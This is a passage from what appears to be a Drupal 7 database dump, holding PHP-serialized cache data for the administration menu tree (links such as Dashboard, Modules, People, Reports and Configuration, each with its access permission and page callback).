comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:0:{}}',0,1444940198,1),('links:management:tree-data:en:cf3ada635e7b2ff0b3311ed1018b1c72c05d73c17303c024f73bd4321f9c0327','a:2:{s:4:\"tree\";a:2:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site 